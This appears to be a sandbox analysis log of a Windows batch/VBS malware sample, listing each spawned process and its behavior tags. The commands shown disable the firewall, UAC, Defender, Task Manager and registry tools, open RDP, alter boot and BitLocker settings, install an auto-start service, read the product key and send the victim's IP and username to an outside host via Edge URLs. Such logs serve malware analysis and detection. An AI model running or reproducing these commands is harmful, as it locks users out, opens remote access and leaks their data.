PID 4796 wrote to memory of 5100	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 5100	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 708	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 708	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 2644	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 2644	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 2096	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 2096	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 2396	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 2396	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 1588	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 1588	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 4396	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 4396	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 3832	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 3832	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 4452	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 4452	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 3520	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 3520	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 2440	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 2440	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 3216	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 3216	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 1260	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 1260	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 4400	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 4400	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 2476	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 2476	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 2344	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 2344	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 1652	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 1652	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 3852	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 3852	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 4496	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 4496	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 2000	4796	cmd.exe	reg.exe
PID 4796 wrote to memory of 2000	4796	cmd.exe	reg.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\malware.vbs"
1⤵
PID:3672

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:208

C:\Windows\System32\Notepad.exe
"C:\Windows\System32\Notepad.exe" C:\Users\Admin\AppData\Local\Temp\malware.vbs
1⤵
- Opens file in notepad (likely ransom note)
PID:2816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\malware.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:4796

C:\Windows\system32\net.exe
net session
2⤵
- Suspicious use of WriteProcessMemory
PID:2000

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
3⤵
PID:4580

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4520

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3456

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2148

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4932

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=3389
2⤵
- Modifies Windows Firewall
PID:2504

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv4
2⤵
- Modifies Windows Firewall
PID:1488

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow
2⤵
- Modifies Windows Firewall
PID:4228

C:\Windows\system32\netsh.exe
netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
2⤵
- Modifies Windows Firewall
PID:2720

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:4728

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
2⤵
PID:1620

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f
2⤵
PID:5100

C:\Windows\system32\reg.exe
REG IMPORT "C:\Users\Admin\AppData\Local\Temp\disable_winload.reg"
2⤵
PID:708

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f
2⤵
PID:2644

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached" /f
2⤵
PID:2096

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /f
2⤵
PID:2396

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f
2⤵
PID:1588

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f
2⤵
PID:4396

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f
2⤵
PID:3832

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f
2⤵
PID:4452

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
2⤵
- UAC bypass
PID:3520

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:2440

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f
2⤵
PID:3216

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f
2⤵
PID:1260

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f
2⤵
PID:4400

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:2476

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:2344

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:1652

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:3852

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
PID:4496

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
2⤵
PID:2000

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f
2⤵
PID:2780

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f
2⤵
PID:780

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f
2⤵
PID:1972

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f
2⤵
PID:3540

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f
2⤵
PID:4500

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
2⤵
PID:1360

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
2⤵
- Disables RegEdit via registry modification
PID:4916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4
2⤵
PID:2744

C:\Windows\system32\ipconfig.exe
ipconfig
3⤵
- Gathers network information
PID:3672

C:\Windows\system32\findstr.exe
findstr IPv4
3⤵
PID:5004

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.perfect.wuaze.com/guardar_ip.php?id=10.127.0.216
2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4988

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0x40,0x128,0x7ffcb89146f8,0x7ffcb8914708,0x7ffcb8914718
3⤵
PID:2724

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2024 /prefetch:2
3⤵
PID:3136

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4044

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8
3⤵
PID:2816

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
3⤵
PID:3540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
3⤵
PID:2336

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8
3⤵
PID:5348

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5492

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
3⤵
PID:5500

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:1
3⤵
PID:5508

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2224 /prefetch:1
3⤵
PID:5792

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1
3⤵
PID:5800

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:1
3⤵
PID:5196

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
3⤵
PID:5304

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,2636948390702245920,11480390619325034164,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
3⤵
PID:5620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c whoami
2⤵
PID:5028

C:\Windows\system32\whoami.exe
whoami
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4956

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=admin
2⤵
PID:6128

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcb89146f8,0x7ffcb8914708,0x7ffcb8914718
3⤵
PID:1360

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=yclextal\admin
2⤵
PID:5188

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcb89146f8,0x7ffcb8914708,0x7ffcb8914718
3⤵
PID:3116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net user "Admin"
2⤵
PID:5280

C:\Windows\system32\net.exe
net user "Admin"
3⤵
PID:5312

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user "Admin"
4⤵
PID:1968

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\notepad.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5344

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5444

C:\Windows\system32\manage-bde.exe
manage-bde -off C:
2⤵
PID:5132

C:\Windows\system32\manage-bde.exe
manage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"
2⤵
PID:5160

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled yes
2⤵
- Modifies boot configuration data using bcdedit
PID:5172

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
2⤵
- Modifies boot configuration data using bcdedit
PID:5348

C:\Windows\system32\sc.exe
sc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"
2⤵
- Launches sc.exe
PID:3912

C:\Windows\system32\net.exe
net start MiServicio
2⤵
PID:4976

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start MiServicio
3⤵
PID:2068

C:\Windows\system32\takeown.exe
takeown /F "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2708

C:\Windows\system32\icacls.exe
icacls "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault" 2>nul | find "BackupProductKeyDefault"
2⤵
PID:5296

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault"
3⤵
PID:4140

C:\Windows\system32\find.exe
find "BackupProductKeyDefault"
3⤵
PID:5412

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.perfect.wuaze.com/guardar_ip.php?id=
2⤵
PID:2040

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcb89146f8,0x7ffcb8914708,0x7ffcb8914718
3⤵
PID:2768

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4140

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\malware.bat
1⤵
- Modifies data under HKEY_USERS
PID:4752

C:\Windows\system32\net.exe
net session
2⤵
PID:4148

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
3⤵
PID:5624

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5648

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5684

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:444

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:6028

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=3389
2⤵
- Modifies Windows Firewall
PID:6016

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv4
2⤵
- Modifies Windows Firewall
PID:6068

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow
2⤵
- Modifies Windows Firewall
PID:2440

C:\Windows\system32\netsh.exe
netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
2⤵
- Modifies Windows Firewall
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:5308

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:5136

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
2⤵
PID:2912

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f
2⤵
PID:5616

C:\Windows\system32\reg.exe
REG IMPORT "C:\Windows\TEMP\disable_winload.reg"
2⤵
PID:5636

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f
2⤵
PID:5688

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached" /f
2⤵
- Modifies data under HKEY_USERS
PID:1916

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /f
2⤵
- Modifies data under HKEY_USERS
PID:3328

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f
2⤵
- Modifies data under HKEY_USERS
PID:5736

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f
2⤵
- Modifies data under HKEY_USERS
PID:6080

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f
2⤵
PID:2444

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f
2⤵
PID:4140

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
2⤵
- UAC bypass
PID:4200

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:5284

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:5352

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f
2⤵
- Modifies data under HKEY_USERS
PID:5600

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f
2⤵
- Modifies data under HKEY_USERS
PID:5592

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:5700

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:5508

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:2340

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:5748

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:5932

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
2⤵
PID:6064

C:\Windows\system32\reg.exe
